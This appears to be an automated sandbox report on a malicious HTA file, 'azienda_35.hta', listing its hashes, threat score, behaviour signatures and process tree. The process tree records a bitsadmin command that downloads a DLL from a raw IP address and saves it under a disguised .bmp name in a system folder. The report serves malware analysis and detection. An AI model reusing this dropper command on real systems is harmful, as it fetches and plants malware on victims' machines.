Overview

overview

8

Static

static

1

azienda_35.hta

windows7-x64

8

azienda_35.hta

windows10-2004-x64

8

Analysis

  • max time kernel
    45s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    08/02/2023, 04:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    azienda_35.hta

  • Size

    6KB

  • MD5

    6627612314308237e214d6101125bb42

  • SHA1

    5639b5fd391f0a7a7ea15fffca349f340c352cfe

  • SHA256

    7cefc61d74c269fe571515a9be34a76b239abed349335a79e60fc923aa619030

  • SHA512

    b68a08a167cde5b3ad3afac9728de2f5f09c66f5100262fabd87557e0c80228a008d3a9ad98831e58aa9bab90391882a0891243fa1f5af23dc3dff943ebf2923

  • SSDEEP

    96:wDBFi3MLVTUoPg2pwTEeD4b7KdaO3iOaLt3M8Mn3XTPMJsb0ODcFE+Voq3V4d292:K/U77rIKdn863jMM0OD9+VVF44xikuj

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\azienda_35.hta"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:916
    • C:\Windows\SysWOW64\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://62.173.147.3/azienda.dll C:\Windows\\System32\\LogFiles\\\login.bmp
      2⤵
      • Download via BitsAdmin
      PID:388

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/916-54-0x0000000076091000-0x0000000076093000-memory.dmp

    Filesize

    8KB

    Download